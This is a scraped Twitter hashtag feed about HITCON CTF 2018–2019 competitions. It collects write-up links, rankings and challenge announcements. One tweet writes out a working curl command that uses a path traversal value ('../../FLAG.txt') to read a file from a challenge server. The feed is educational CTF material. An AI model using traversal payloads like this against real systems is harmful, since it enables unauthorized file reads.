-
Nice writeup from LC↯BC for my windows kernel challenge "breath of shadow" ! https://github.com/mephi42/ctf/tree/master/2019.10.12-HITCON_CTF_2019/pwn-Breath_of_Shadow … In my intended solution, you need to deal with "KVA Shadow" so that you can jump to shellcode in userspace. Thank you for solving my challenge :)
#hitconctf -
-
The unintended solution for my challenges at HITCON CTF 2019 Quals. https://github.com/0xddaa/ctf_challenges … I should put the flag path in the challenge description of One Punch Man. Sorry my bad.
#hitconctfPrikaži ovu nit -
Tweet-contained solution in collab with
@gmerzdovnik to#hitconctf Buggy .Net challenge by@orange_8361 curl -X GET -d 't=<s&filename=../../FLAG.txt' 52.197.162.211 Technique inspired from https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/ … but no encoding trickeries needed here
@We_0wn_Y0u -
I've publish the challenges I made for HITCON CTF 2019 Quals ( EmojiVMs, Core Dumb ) , including source code & solutions: https://github.com/bruce30262/CTF_challenge_public/tree/master/hitcon2019_qual … ( More like a blog post on github :P ) Hope you guys had fun solving my challenges :)
#hitconctf -
a story about software and hardware SMEP in windows kernel https://github.com/scwuaptx/CTF/blob/master/2019-writeup/hitcon/breathofshadow.c …
@scwuaptx#hitconctf -
HITCON CTF 2019 Top 15 Bar Chart Race https://ctf2019.hitcon.org/dashboard/trend
#hitconctf -
My exploit for my challenges at HITCON CTF 2019 Qual https://github.com/scwuaptx/CTF/tree/master/2019-writeup/hitcon … Hope everyone can learn more from our CTF.
#hitconctf -
We got 2nd place in HITCON Quals 2019! HITCON is definitely one of the best CTFs! We really learn a lot in this one. Let's give the organizers a standing ovation

.
#hitcon#ctf#hitconctf pic.twitter.com/KbS15AUAMj
Prikaži ovu nit -
-
HITCON CTF 2019 Quals is ongoing now!
@filedescriptor and I designed an XSS challenge this time and there are two solutions at least, could you find that? :D http://3.114.5.202/ https://ctf2019.hitcon.org/#hitcon#ctf#hitconctf -
HITCON CTF this week will be the next
@DEFCON 28#CTF qualifier! REGISTER NOW!!! http://ctf2019.hitcon.org#hitconctf#hitconhttps://twitter.com/oooverflow/status/1181820337282928640 … -
You think pwnable dot tw is hard? Try this one. https://ctf2019.hitcon.org
#hitconctf -
My writeup for the "Secret Note" challenge in HITCON CTF 2018 - unfortunately I didn't have much time to play, but it was an amazing CTF!
#hitcon#hitconctf https://abiondo.me/2018/10/23/hitcon18-secretnote/ … -
source and writeup for the challenge "windowsland", exploit safe-unlink with dangling pointer in win10 user-mode heap, https://github.com/wmliang/windowsland …
#hitconctf -
All my challenges' source code and solutions for HITCON 2018! Congrats to
@DragonSectorCTF@PlaidCTF and BFKinesiS! https://github.com/david942j/ctf-writeups/tree/master/hitcon-2018 …#hitconctf -
We placed 8th at
#hitconctf out of 15 teams in the finals (and 1000+ in the quals)! Fun was had, knowledge was gained, and food was eaten! Always a pleasure hacking with@shellphish@chris_salls@m1ghtymo /cc@ASUEngineeringpic.twitter.com/7nNiXpHQex
-
Official writeup of Real Ruby Escaping in hitcon-quals-2017
#hitconctf#HITCON#Ruby#Pwn https://david942j.blogspot.tw/2017/11/official-write-up-hitcon-ctf-2017.html … -
I learned a lot about the heap again at
#hitconctf. Here are my solutions for Ghost in the heap and Damocles: https://gist.github.com/sroettger/e1a7f8ca5007e2646b8f8ce068ca6166 … -
My (unintended?) solution + short writeup for "ragnarok": https://gist.github.com/saelo/0c77ce6c2b84af70644d81802892c289 …
#hitconctf UAF + arbitrary write via C++ string assignment
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
𝚙𝚠𝚗𝙿𝙷𝙾𝚏𝚞𝚗
with my awesome teammates